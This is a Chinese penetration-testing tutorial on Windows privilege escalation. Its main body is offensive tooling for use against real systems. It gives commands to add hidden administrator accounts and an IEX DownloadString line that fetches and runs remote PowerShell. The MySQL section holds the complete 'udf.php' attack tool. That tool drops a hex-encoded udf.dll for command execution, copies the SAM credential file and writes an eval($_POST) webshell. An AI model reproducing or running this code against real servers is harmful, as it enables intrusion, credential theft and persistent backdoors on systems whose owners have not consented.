windows提权知识Windows Privilege Escalation

windows提权知识Windows Privilege Escalation

技能树, 渗透测试, 黑客技术

提权基础

权限划分

  • Administrators:管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。
  • Power Users:高级用户组,Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。
  • Users:普通用户组,这个组的用户无法进行有意或无意的改动。
  • Guests:来宾组,来宾跟普通Users的成员有同等访问权,但来宾帐户的限制更多
  • Everyone:所有的用户,这个计算机上的所有用户都属于这个组。

基础命令

$ query user               # 查看用户登陆情况
$ whoami                   # 当前用户权限
$ set                      # 环境变量
$ hostname                 # 主机名
$ systeminfo               # 查看当前系统版本与补丁信息
$ ver                      # 查看当前服务器操作系统版本
$ net user                 # 查看用户信息
$ net start                # 查看当前计算机开启服务名称
$ netstat -ano             # 查看端口情况
$ netstat -ano|find "3389" # 查看指定端口
$ tasklist                 # 查看所有进程占用的端口
$ taskkil /im xxx.exe /f   # 强制结束指定进程
$ taskkil -PID pid         # 结束某个pid号的进程
$ tasklist /svc|find "TermService" # 查看服务pid号
$ wmic os get caption              # 查看系统名
$ wmic product get name,version    # 查看当前安装程序
$ wmic qfe get Description,HotFixID,InstalledOn # 查看补丁信息
$ wmic qfe get Description,HotFixID,InstalledOn | findstr /C:"KB4346084" /C:"KB4509094" # 定位特定补丁

# 添加管理员用户
$ net user username(用户名) password(密码) /add  # 添加普通用户
$ net localgroup adminstrators username /add   # 把普通用户添加到管理员用户组
# 如果远程桌面连接不上可以添加远程桌面组
$ net localgroup "Remote Desktop Users" username /add

系统漏洞提权

系统漏洞漏洞提权一般就是利用系统自身缺陷,用来提升权限。通常利用systeminfo查看补丁记录,来判断有哪个补丁没打,然后使用相对应的exp进行提权。

查询补丁信息

  • WinSystemHelper:检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测.

WinSystemHelper对于Windows 2003:


KB2360937,MS10-084,https://technet.microsoft.com/library/security/ms10-084
KB2478960,MS11-014,https://technet.microsoft.com/library/security/MS11-014
KB2507938,MS11-056,https://technet.microsoft.com/library/security/MS11-056
KB2566454,MS11-062,https://technet.microsoft.com/library/security/MS11-062
KB2646524,MS12-003,https://technet.microsoft.com/library/security/MS12-003
KB2645640,MS12-009,https://technet.microsoft.com/library/security/MS12-009
KB2641653,MS12-018,https://technet.microsoft.com/library/security/MS12-018
KB944653,MS07-067,https://technet.microsoft.com/library/security/MS07-067
KB952004,MS09-012,https://technet.microsoft.com/library/security/MS09-012
KB971657,MS09-041,https://technet.microsoft.com/library/security/MS09-041
KB2620712,MS11-097,https://technet.microsoft.com/library/security/MS11-097
KB2393802,MS11-011,https://technet.microsoft.com/library/security/MS11-011
kb942831,MS08-005,https://technet.microsoft.com/library/security/MS08-005
KB2503665,MS11-046,https://technet.microsoft.com/library/security/MS11-046
KB2592799,MS11-080,https://technet.microsoft.com/library/security/MS11-080
KB956572,MS09-012,https://technet.microsoft.com/library/security/MS09-012
KB2621440,MS12-020,https://technet.microsoft.com/library/security/MS12-020
KB977165,MS10-015,https://technet.microsoft.com/library/security/MS10-015

WinSystemHelper对于Windows 2003以上:

KB3077657,MS15-077,https://technet.microsoft.com/library/security/MS15-077
KB3045171,MS15-051,https://technet.microsoft.com/library/security/MS15-051
KB3087039,MS15-097,https://technet.microsoft.com/library/security/MS15-097
KB3000061,MS14-058,https://technet.microsoft.com/library/security/MS14-058
KB2829361,MS13-046,https://technet.microsoft.com/library/security/MS13-046
KB2850851,MS13-053,https://technet.microsoft.com/library/security/MS13-053
KB2707511,MS12-042,https://technet.microsoft.com/library/security/MS12-042
KB970483,MS09-020,https://technet.microsoft.com/library/security/MS09-020
KB3124280,MS16-016,https://technet.microsoft.com/library/security/MS16-016
KB2124261,MS10-065,https://technet.microsoft.com/library/security/MS10-065
KB3139914,MS16-032,https://technet.microsoft.com/library/security/MS16-032
KB3140745,MS16-032,https://technet.microsoft.com/library/security/MS16-032
KB3140768,MS16-032,https://technet.microsoft.com/library/security/MS16-032
  • 上传WinSysHelper.batexplt2003.txtexpgt2003.txt,运行bat查看结果
    • 然后在可利用的Exp中任意下载一个并执行即可
$ WinSysHelper.bat
  • Sherlock:在Windows下用于本地提权的PowerShell脚本
    • 分析漏洞出漏洞后利用对应Exp即可

Sherlock当前能扫描的漏洞:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : ‘mrxdav.sys’ WebDAV
  • MS16-032 : Secondary Logon Handle
  • MS16-034 : Windows Kernel-Mode Drivers EoP
  • MS16-135 : Win32k Elevation of Privilege
  • CVE-2017-7199 : Nessus Agent 6.6.2 – 6.10.3 Priv Esc
# 启动Powershell
$ powershell.exe -exec bypass

# 本地加载脚本
$ Import-Module Sherlock.ps1

# 远程加载脚本
$ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

# 检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞
$ Find-AllVulns

提权步骤

除了需要注意每种漏洞所适用的详细系统版本及位数外,实战中还需要事先免杀并调试好Exp,否则可能有蓝屏等风险。

[01]: KB2999226
[02]: KB976902
  • 然后根据可选补丁编号以及目标系统,选择对应的Exp下载运行即可。
  • 另外还需要注意提权Exp的运行方式,一般有以下几种:
    • 直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
    • 在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
    • 利用MSF等工具
    • C++源码,Python脚本,PowerShell脚本等特殊方式

数据库提权

MySQL

  • 前提:拿到Root密码
  • 注意:
    • MySQL5.7以后secure-file-priv的问题
    • MySQL5.7后,系统的用户表mysql.user中的密码字段已从password修改为authentication_string

UDF提权

  • 原理:通过root权限,导入udf.dll到系统目录下,可以通过udf.dll调用执行cmd
  • 利用条件
    • 系统版本:Win2000、WinXP、Win2003
    • 具有对MySQL的insert/delete权限的账号,用以创建和抛弃函数。最好是root,或具备root账号所具备的权限的其它账号。
UDF木马提权
  • 已有Webshell的情况下可以直接上UDF马
udf.php
<?php
//t00ls...................
session_start();?>
<html>
<head>
<title>T00ls UDF.PHP</title>
<style type="text/css">
input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
</style>
<script type="text/javascript">
function outfile(){
	document.getElementById("sql2").value= unescape("select%20%27%3C%3Fphp%20eval%28%24_POST%5B%5C%27pass%5C%27%5D%29%3F%3E%27%20into%20outfile%20%27d%3A%5C%5Cninty.php%27");
}
function loadfile(){
	document.getElementById("sql2").value = unescape("select%20load_file%28%27c%3A%5C%5Cboot.ini%27%29");
}
</script>
</head>
<body>
<?php
error_reporting(0);
if (isset($_REQUEST['action']))
	$action = $_REQUEST['action'];
else
	$action = 'vConn';
switch ($action) {
	case 'vConn':
		vConn();
		break;
	case 'conn':
		conn();
		break;
	case 'exec':
		execsql();
		break;
	case 'install':
		install();
		break;
	case 'copy':
		cp();
		break;
	case 'cplug':
		cplug();
		break;
	case 'logout':
		logout();
		break;
	case 'func':
		func();
		break;
}
function vConn() {
	echo 'by ninty http://www.t00ls.net/<form action="" method="post"><table><input type="hidden" name="action" value="conn">
<tr><td>ip:</td><td><input type="text" name="host" value="localhost"></td></tr><tr><td>uid:</td><td><input type="text" value="root" name="uid"></td></tr><tr><td>pwd:</td><td><input type="text" name="pwd"></td></tr><tr><td>db:</td><td><input type="text" name="db" value="mysql"></td></tr><tr><td><input type="submit"/></td><td>&nbsp;</td></tr></table></form>';
}
function func(){
	$conn = conn(false);
	mysql_select_db('mysql',$conn);
	mysql_query('CREATE TABLE `func` ( `name` char(64) collate utf8_bin NOT NULL default \'\', `ret` tinyint(1) NOT NULL default \'0\', `dl` char(128) collate utf8_bin NOT NULL default \'\', `type` enum(\'function\',\'aggregate\') character set utf8 NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\'User defined functions\'');
	if (mysql_errno($conn) != 0) {
		echo mysql_error() . '<br/>';
	}
	echo 'Create mysql.func success !';
	mysql_close($conn);
}
function conn($close = true) {
	if (isset($_SESSION['host'])) {
		$host = $_SESSION['host'];
		$uid = $_SESSION['uid'];
		$pwd = $_SESSION['pwd'];
		$db = $_SESSION['db'];
	} else {
		$host = $_POST['host'];
		$uid = $_POST['uid'];
		$pwd = $_POST['pwd'];
		$db = $_POST['db'];
	}
	$conn = mysql_connect($host,$uid,$pwd);
	if (!$conn) {
		echo mysql_error().'<br/>';
		vConn();
		exit();
	} 
	mysql_select_db($db,$conn);
	if (mysql_errno($conn) != 0) {
		echo mysql_error().'<br/>';
		vConn();
		exit();
	}
	$_SESSION['host'] = $host;
	$_SESSION['uid'] = $uid;
	$_SESSION['pwd'] = $pwd;
	$_SESSION['db'] = $db;
	//mysql_query('set names utf8');
	showM($conn,$close);
	return $conn;
}
function logout(){
	unset($_SESSION['host']);
	unset($_SESSION['uid']);
	unset($_SESSION['pwd']);
	unset($_SESSION['db']);
	unset($_SESSION['notsame']);
	unset($_SESSION['over51']);
	unset($_SESSION['plugindir']);
	$url = $_SERVER['PHP_SELF']; 
	$filename = end(explode('/',$url));  
	echo '<script>location.href = "'.$filename.'?rn="+Math.random()</script>';
}
function showM(&$conn,$close = true){
	echo '<center><b>t00ls UDF.PHP</b></center>';
	echo '<form action="" method="post"><input type="hidden" name="action" value="logout"><input type="submit" value="Logout"></form>';
	echo '<div style="border:solid 1px #333;background-color:#999;padding:4px">';
	$sql = 'select concat(\'<b>user()</b>:\',user()) as m union select concat(\'<b>database():</b>\',database()) union select concat(\'<b>datadir</b>:\',@@datadir) union select concat(\'<b>basedir</b>:\',@@basedir) union select concat(\'<b>version()</b>:\',version()) ;';
	$meta = mysql_query($sql,$conn);
	$tmp = 1;
	while ($row = mysql_fetch_array($meta,MYSQL_ASSOC)) {
		echo $row['m'];
		if ($tmp == 1) {
			$tmp = 2;
			$h = substr($row['m'],strpos($row['m'],'@')+1);
			if ($h != 'localhost') {
				echo ' <b><i><font color=green>[web and db is not the same server.]</font></i></b>';
			$_SESSION['notsame'] = 'true';
			}
		}
		echo '<br/>';
	}
	echo '<b>plugin_dir</b>:';
	$meta = mysql_query('show variables like "plugin_dir"');
	if (mysql_num_rows($meta)==0) {
		echo '<font color=white>mysql is under 5.1 , ';
		if (!isset($_SESSION['notsame']))
			echo ' u can dump udf.dll to any directory in follow paths';
		echo '</font>';
	} else {
		//over 5.1
		$_SESSION['over51'] = 'true';
		$row = mysql_fetch_row($meta);
		$_SESSION['plugindir'] = str_replace('\\','\\\\',str_replace('/','\\',$row[1])).'\\\\udf.dll';
		echo '<font color=white>'.str_replace('/','\\',$row[1]).'</font>';
		echo ' (mysql over 5.1, udf.dll can only dump to plugin_dir) ';
		if (isset($_SESSION['notsame'])) 
			echo ' <font><b><i>[maybe dump dll will be failed!]</i></b></font>';
		else {
			if (!file_exists(str_replace('/','\\',$row[1]))) 
				echo ' <a href="?action=cplug&dir='.base64_encode(str_replace('/','\\',$row[1])).'">Create PluginDir</a>';
			else 
				echo ' exists!';
		}
	}
	echo '<br/>';
	if (!isset($_SESSION['notsame']) && !isset($_SESSION['over51']))
		echo '<b>path</b>:<font color=green><b>'.getenv('path').'</b></font><br/>';
 	$meta = mysql_query('select 1,1,1,1 from mysql.user union select * from mysql.func');
	if (mysql_num_rows($meta)==0)
		echo '<b>Mysql.Func</b> : <font color=white><b><i><font color=red>dont exist!</font></i></b></font> must <a href="?action=func">create</a> mysql.func first!';
	else 
		echo '<b>Mysql.Func</b> : <font color=green>exist!</font>';
	echo '<br/>';
	echo '<b>grants</b> : <font color=white>';
	$meta = mysql_query('show grants;',$conn);
	while ($row = mysql_fetch_row($meta)) {
		echo $row[0];
	}
	echo '</font>';
	echo '</div>';
	if ($close)
		mysql_close($conn);
	echo '<br/>';
	if (isset($_POST['path'])) {
		$path = $_POST['path'];
		if (get_magic_quotes_gpc()) 
			$path = stripslashes($path);
	}
	else
		$path = isset($_SESSION['plugindir']) ? $_SESSION['plugindir'] : 'c:\\\\windows\\\\system32\\\\udf.dll';
	echo '<div style="border:solid 1px #333;background-color:#999;padding:4px"><form action="" method="post"><input type="hidden" name="action" value="install"><input type="text" name="path" size="60" value="'.$path.'"> <input type="submit" value="Dump UDF"></form>';
	echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><input type="hidden" name="dump" value="d"><input type="text" name="sql" size="60" value="CREATE FUNCTION shell RETURNS STRING SONAME \'udf.dll\'"> <input type="submit" value="Create Function"></form>';
	echo '<form action="" method="post"><input type="hidden" name="action" value="copy"><input type="text" value="c:\\\\WINDOWS\\\\repair\\\\sam" name="source" size=30>  <input type="text" name="target" size=30> <input type="submit" value="Copy"> <font color=white>please convert \\ to \\\\</font></form></div>';
	if (isset($_POST['sql']))
		$sql = $_POST['sql'];
	else
		$sql = 'select * from mysql.user';
	if (get_magic_quotes_gpc())
		$sql = stripslashes($sql);
	if (isset($_POST['dump']))
		$sql = 'select shell(\'cmd\',\'whoami\')';
	echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><textarea id="sql2" cols="100" rows="5" name="sql">'.$sql.'</textarea><br/><input type="submit" value="Mysql_query"> <input type="button" value="Load_File" onclick="loadfile()"> <input type="button" value="Into OutFile" onclick="outfile()"></form>';
}
function cplug(){
	$path = $_GET['dir'];
	$path = base64_decode($path);
	$arr = explode('\\',$path);
	$p = '';
	$err = '';
	for ($index = 0,$count = count($arr);$index<$count;$index++) {
		$p .= ($arr[$index] . '\\');
		if (!file_exists($p)) {
			if (!mkdir($p)) {
				$err = 'create '.$p.'failed !';
				break;
			}
		}
	}
	conn();
	if ($err != '')
		exit($err);
	if (file_exists($path))
		echo 'plugin_dir create success !';
	else
		echo 'plugin_dir create failed !';
}
function execsql() {
	$conn = conn(false);
	$sql = $_POST['sql'];
	if (get_magic_quotes_gpc())
		$sql = stripslashes($sql);
	$rs = mysql_query($sql,$conn);
	echo mysql_info($conn);
	if (@mysql_num_rows($rs) > 0) {
		echo '<table border="1">';
		$cols = mysql_num_fields($rs);
		$index = 0;
		echo '<tr>';
		while ($index < $cols) {
			echo '<th>'.mysql_field_name($rs,$index).'</th>';
			$index ++;
		}
		echo '</tr>';
		while ($row = mysql_fetch_row($rs)) {
			$index = 0;
			echo '<tr>';
			while ($index < $cols) {
				echo '<td>';
				echo str_replace(chr(13),'<br/>',htmlspecialchars($row[$index]));
				echo '</td>';
				$index ++;
			}
			echo '</tr>';
 		}
		echo '</table>';
	}
	if (mysql_errno($conn) != 0)
		echo mysql_error();
	mysql_close($conn);
}
function cp(){
	$conn = conn(false);
	$source = $_POST['source'];
	$target = $_POST['target'];
	if (get_magic_quotes_gpc()) {
		$source = stripslashes($source);
		$target = stripslashes($target);
	}
	mysql_query('select unhex(hex(load_file("'.$source.'"))) into dumpfile "'.$target.'"');
	if (mysql_errno($conn) != 0)
		echo mysql_error().'<br/>';
	else
		echo 'done !';
	mysql_close($conn);
}
function install() {
//dump udf.dll
	$conn = conn(false);
	$path = $_POST['path'];
	if (get_magic_quotes_gpc()) 
		$path = stripslashes($path);
	mysql_query('create table udftmp (c blob)');
	if (mysql_errno($conn) != 0) {
		echo mysql_error().'<br/>';
		mysql_query('drop table udftmp');
		mysql_close($conn);
		exit();
	}
	mysql_query('insert into udftmp values(convert(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000007148657F35290B2C35290B2C35290B2C35290B2C3F290B2CF626562C31290B2C4E35072C34290B2C5A36012C31290B2CB635052C36290B2C5A360F2C31290B2C5A36002C34290B2C5736182C3E290B2C35290A2C56290B2CF6266B2C38290B2CF626572C34290B2CF626512C34290B2C5269636835290B2C00000000000000000000000000000000504500004C010400BFC7514B0000000000000000E0000E210B01070A00220000001C0000000000002D300000001000000040000000000010001000000002000004000000000000000400000000000000008000000004000000000000020000000000100000100000000010000010000000000000100000002052000070000000A44A0000B40000000000000000000000000000000000000000000000000000000070000064020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000004C0100000000000000000000000000000000000000000000000000002E746578740000000C210000001000000022000000040000000000000000000000000000200000602E7264617461000090120000004000000014000000260000000000000000000000000000400000402E64617461000000500000000060000000020000003A0000000000000000000000000000400000C02E72656C6F630000080400000070000000060000003C00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000558BEC83EC14578D45FC506A28FF156040001050FF151C4000108B450CF7D81BC083E0028945F88D45F050FF7508C745EC010000006A00FF15204000106A006A006A108D45EC506A00FF75FCFF15244000108BF885FF7500FF75FCFF15A44000108BC75FC9C3558BEC81EC8004000053568B35804000105733DB538D45D4508D45EC5033FF8D45F44750885DFF885DFEC745D40C000000895DD8897DDCFFD685C00F84F3000000538D45D4508D45E4508D45F050FFD685C00F84DC0000008D458050FF15844000108B45F08945B88B45EC8945C08945BC8D45C4508D458050535353575353FF750CC745AC010100005366895DB0FF158840001085C00F84980000008B3534400010C645FF01FFD68B3D8C4000108945E8EB67395DF87642B8000400003945F872038945F8538D45E050FF75F88D8580FBFFFF50FF75F4FF159040001085C07453FF75E08B4D088B018D9580FBFFFF52FF5004FFD68945E8EB1853FF75C4FF159440001085C0742CFFD62B45E83B4510731E6A07FF159C400010538D45F850535353FF75F4895DF8FFD785C07585EB04C645FE01FF15A0400010385DFF8B35A44000108BF8741E385DFE740F395D14740A53FF75C4FF15A8400010FF75C8FFD6FF75C4FFD6395DF07405FF75F0FFD6395DEC7405FF75ECFFD6395DE47405FF75E4FFD6395DF47405FF75F4FFD657FF15B04000105F5E33C05BC9C3837C24040274138B44240C8B08686041001050FF51085959EB48568B74240C57566A02E8A2010000050004000050FF1508410010FF76048BF8685041001057FF15044100106A0168E02E000057FF742438E80FFEFFFF57FF150041001083C42C5F5E33C0C3837C24040274138B44240C8B08687C41001050FF51085959EB1A8B4424086A0068D0070000FF7004FF742418E8CFFDFFFF83C41033C0C38BC18B4C24048948088B4C240889480C8A4C240CC70098410010884804C7401002000000C20C00C70198410010C3F644240401568BF1C70698410010740756E8021C0000598BC65EC20400565733FF8BF147397E087E52807E04008B460C8B04B88A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C05959740D473B7E087CAE32C05F5EC20400B001EBF756578BF1836614006A025F397E087E62807E04008B460C8B44B8FC8A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C059597408473B7E087CADEB0D8B460C8B04B847894614897E108B46145F5EC20400565733FF33F6397C240C7E188B442410FF34B8E8111B0000473B7C2410598D7406017CE85F8BC65EC333C0390510600010740D5050A310600010FF15444100108B0D24600010E89A0E00008B4C240489410C32C0C38B442404FF700C8B0D24600010E875180000C3558BEC518B0D246000108365FC00568B7514568D45FC508B450CFF7008FF308B4508FF700CE80F190000833EFF7516837DFC00740DFF75FCE8841A0000598906EB038326008B45FC8B551885C00F94C1880A5EC9C3837C240801752B8B4424046A2CA320600010E85B1A000085C05974098BC8E879180000EB0233C085C0A324600010752AEB2B837C24080075218B0D2460001085C97417568BF1E8BE17000056E80A1A000083252460001000595E33C040C20C00558BEC83EC1453578D45F8506A08FF750833DB895DF8895DF4FF151C4000108BF83BFB7467568B35144000108D45FC5053536A01FF75F8895DFCFFD6395DFC8BF87648FF75FCE8C7190000598D4DFC51FF75FC8945F4506A01FF75F8FFD68BF83BFB74278D45EC508D45F050FF750C8D451450FF75108B45F4C745F004010000FF3053FF15184000108BF85E395DF87409FF75F8FF15A4400010395DF47409FF75F4E854190000598BC75F5BC9C38B4424048B0868A041001050FF51085959C3558BECB838250000E85B1900006683A5D4FDFFFF006683A5D8FEFFFF005356576A4033C0598DBDD6FDFFFFF3AB66AB6A4033C0598DBDDAFEFFFFF3AB33DB43395D0C66AB8BC3C645FD00C645FA00C645FF00C645FE00C645FB00C645FC008945F40F86B30000008B75108B3DFC400010C1E0028B0C3080392D75710FBE510183EA6B743A4A74314A7562837D0C030F8C900000008A490280F970C645FA01741280F97375478B443004C645FE018945DCEB3AC645FF01EB1DC645FD01EB2E837D0C037C670FBE490283E96E74144949751BC645FB01FF743004FFD7598945ECEB0B8B443004C645FC018945E08B45F4403B450C8945F40F8274FFFFFF807DFD007530807DFF00752A807DFE007524807DFB00751E807DFC007518FF7508E8CCFEFFFFEB4368CC420010EB3268B0420010EB2B53689C420010E81BF9FFFF59598D45E45068001000008D85C8DAFFFF50E8E619000085C0751768804200108B45088B0850FF510859598BC3E9B30200008365F400F745E4FCFFFFFF0F86A00200008D9DC8DAFFFFBE04010000FF338B3D384000106A006810040000FFD785C089450C0F84640200008365E80068001000008D85C8EAFFFF6A0050E89A170000568D85D4FDFFFF6A0050E88B170000568D85D8FEFFFF6A0050E87C170000568D85D0FCFFFF6A0050E86D170000568D85CCFBFFFF6A0050E85E170000568D85D4FDFFFF508D85D8FEFFFF50FF750CE82FFDFFFF83C44C8D45E85068001000008D85C8EAFFFF50FF750CE80819000085C0742C568D85D0FCFFFF50FFB5C8EAFFFFFF750CE8E8180000568D85CCFBFFFF50FFB5C8EAFFFFFF750CE8CC180000807DFB0074078B45EC3903741C807DFC007463FF75E08D85CCFBFFFF50FF15CC40001085C05959754DFF750CFF15A4400010FF336A006A01FFD785C08B7D0889450C74358B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4186A00FF750CFF15A8400010EB038B7D08807DFD0074258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C418807DFF0074148B45EC3B03750D8B07685442001057FF50085959807DFA000F84DE0000008365F000F745E8FCFFFFFF0F86CD000000807DFF0074568B45EC3B030F85BC000000568D85C8FAFFFF6A0050E8031600008B7DF083C40C568D85C8FAFFFF508DBCBDC8EAFFFFFF37FF750CE8BA170000FF378B45088B088D95C8FAFFFF52684442001050FF51088B7D0883C410807DFE007459568D85CCFBFFFF508B45F0FFB485C8EAFFFFFF750CE87717000085C0743BFF75DC8D85CCFBFFFF50FF15EC40001085C0595974258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4188B45E8FF45F0C1E8023945F00F8233FFFFFFFF750CFF15A44000108B45E4FF45F4C1E80283C3043945F40F826BFDFFFF33C05F5E5BC9C3558BEC51568D45FC50681900020033F656FF750CFF7508FF150840001085C075278D451850FF75145656FF7510FF75FCFF150C40001085C07403897518FF75FCFF1510400010EB038975188B45185EC9C3558BEC5151538B5D10578D45FC50FF750C33FF397D20FF7508897DF87508FF1528400010EB2FFF152C40001085C0757957578D4514505753FF75FCFF150C40001085C07564837D2002750E53FF75FCFF150040001085C07550837D1401568B35044000107406837D1402751CFF7518E860140000594050FF7518FF75145753FF75FCFFD685C07520837D140475136A048D451C506A045753FF75FCFFD685C07507C745F8010000005EFF75FCFF15104000108B45F85F5BC9C3558BEC51576810430010FF15404000108BF885FF744A53568B353C40001068FC42001057FFD68BD885DB743268E842001057FFD68BF085F674248D45FC506A016A016A13FFD63D7C0000C0750C8D45FC506A006A016A13FFD6FF7508FFD35E5B5FC9C3566A016870430010E8B7F4FFFF8B7424108B06685843001056FF50088B44241C33C983C4103BC175135151FF152C41001085C075566844430010EB3083F8017514516A06FF152C41001085C0753D6830430010EB1783F802751B516A0CFF152C41001085C07524681C4300108B0656FF500859EB1583F80375046A01EB0783F80475086A02E813FFFFFF5933C0405EC3558BEC837D0C027C288B45108B400480382D751D4050FF15FC40001085C0597C1083F8047F0B50FF7508E841FFFFFFEB0E8B45088B08688843001050FF5108595933C05DC3A13060001085C0752168504400106844440010FF154040001050FF153C40001085C0A3306000107501C36A01FF74240C6A00FFD00FB6C0C3A12860001085C07521686C4400106860440010FF154040001050FF153C40001085C0A3286000107501C36A01FF742408FFD0C3558BEC83EC6456578D45E8508D45E4506A0133FF5757E85D1400003BC78945DC751F8B75088B3EFF15A040001050681045001056FF570883C40C33C0E929010000538B5D088B0368B844001053FF5008397DE88B75E45959897DF00F86FD0000008D45EC508D45FC506A0E897DFC897DF8897DF4FF3657E8F61300008D45EC508D45F8506A0AFF3657E8E41300008D45EC508D45F4506A05FF3657E8D2130000FF7608E825FFFFFF5957576A208D4D9C51508945E0FF15E4400010598D44000250FF75E05757FF15444000108B45FC83380275280FB64809510FB64808510FB648070FB6400651508D45BC68AC44001050FF150441001083C418EB118D45BC68A444001050FF150441001059598B038D4D9C518D4DBC51FF75F8FF75F4FF7604FF36687C44001053FF500883C420FF75FCE836130000FF75F8E82E130000FF75F4E82613000057E82013000083C60CFF45F08B45F03B45E80F8203FFFFFFFF75E4E8061300008B45DC5B5F5EC9C3560FB774240C85F674426A00566A006A0468E045001068984500106802000080E811FCFFFF83C41C85C08B4424088B08740F56686445001050FF510883C40C5EC3683C45001050FF510859595EC3558BEC83EC0C8365F8008365FC0056576A048D45FC50BF9C460010576870460010BE0200008056C745F401000000E864FBFFFF83C41485C07449837DFC0275436A048D45FC5057684046001056E845FBFFFF83C41485C0742A837DFC0275246A048D45F8506834460010BF004600105756E821FBFFFF83C41485C07406837DF800750432C0EB246A048D45F45068EC4500105756E8FEFAFFFF83C41485C07504B001EB07837DF4000F94C05F5EC9C3E84CFFFFFF84C0B9D04600107505B9C44600108B4424048B105168A446001050FF520883C40CC3558BEC83EC108D45FC5068190002006A0068984500106802000080C745F83D0D0000C745F004000000C745F450000000FF150840001085C075488D45F4508D45F8508D45F0506A0068E0450010FF75FCFF150C40001085C0751FFF75F88B45088B0868F046001050FF510883C40CFF75FCFF1510400010C9C3FF75FCFF15104000108B45088B0868D846001050FF51085959C9C3FF742404E83CFFFFFF59E95DFFFFFF515355565733DB536A02536A04BF9C460010576870460010BE0200008056E84CFAFFFF536A02536A0457684046001056E83AFAFFFF8944244833C0385C24546A010F94C0BF0046001050536A0468EC4500105756E816FAFFFF8BE883C4543BEB7406385C241C742133C0385C241C530F95C050536A0468344600105756E8EDF9FFFF83C41C3BC375043BEB7420395C2410741A385C241C8B4424188B0874076850470010EB126830470010EB0B8B4424188B08680C47001050FF510859595F5E5D5B59C3B802310010E8D10E000083EC18837D0C027D158B45088B0868A047001050FF51085959E9EE00000053565733F656FF75108D4DDCFF750CE8ECF1FFFF68984700108D4DDC8975FCE890F2FFFF8B5D0833FF4785C07415FF75F08BF7FF15FC4000105053E80DFDFFFF83C40C68904700108D4DDCE8FBF1FFFF84C0740357EB1368884700108D4DDCE8E7F1FFFF84C0740C6A00538BF7E8A2FEFFFF595968804700108D4DDCE8CAF1FFFF84C07409538BF7E878FEFFFF5968784700108D4DDCE8B0F1FFFF84C07409538BF7E838FBFFFF5968704700108D4DDCE8FFF1FFFF85C07415FF75F08BF7FF15FC4000105053E8A9FAFFFF83C40C85F6750D8B0368A047001053FF50085959834DFCFF8D4DDCE83CF1FFFF5F5E5B8B4DF433C064890D00000000C9C3568B7424108326006A106890490010FF742414E8BF0D000083C40C85C075108B44240889068B0850FF510433C0EB05B8024000805EC20C008B44240483C00450FF1548400010C20400568B742408578D460450FF154C4000108BF885FF750D85F674098B066A018BCEFF500C8BC75F5EC20400F644240401568BF1C70680490010740756E8C10C0000598BC65EC20400568BF18B861C0100005733FF3BC7740D50FF155840001089BE1C0100008B86180100003BC7740D50FF15A440001089BE180100005757576A0457FF760CFF15544000103BC7898618010000750433C0EB15575757681F000F0050FF155040001089861C0100005F5EC383B91C0100000074128B490C83F9FF740A6A0051FF155C400010C333C0C351FF1548400010C38B4424048B1534600010EB028BC18B48083BCA75F7C38B4424048B1534600010EB028BC18B083BCA75F8C38B5424048B02568B700889328B70083B353460001074038956048B72048970048B49043B51045E7505894104EB0F8B4A043B51087505894108EB028901895008894204C20400568BF18B0E83791400750D8B410439480475058B4108EB1E8B013B0534600010740D50E867FFFFFF59EB0B89068BC88B41043B0874F589065EC3568BF18B0E8B41083B0534600010740D50E855FFFFFF59EB1389068BC88B41043B480874F48B0E394108740289065EC38B44240485C0740E8B4C24088B1189108B4904894804C353568BF133DB895E04C74608A049001068C849001053C706B8490010C74608AC490010FF15D8400010834E0CFF5959885E10899E18010000899E1C010000C78614010000010000008BC65E5BC3558BECB800200000E80C0B00008D451050FF750C8D8500E0FFFF50FF15D44000108B4D088B1183C40C508D8500E0FFFF50FF5204C9C3568BF1E814000000F644240801740756E8A10A0000598BC65EC20400568BF18B861C01000085C0C706B8490010C74608AC490010740750FF15584000108B861801000085C0578B3DA4400010740350FFD78B460C83F8FF740350FFD783BE14010000005F740F8D4610803800740750FF15AC400010C706804900105EC3566820010000E8450A000085C059740B8BC8E8E9FEFFFF8BF0EB0233F685F674068B0656FF50048BC65EC3558BEC518365FC00837D0CFF568BF1750CFF7508E8060A00005989450C837E04F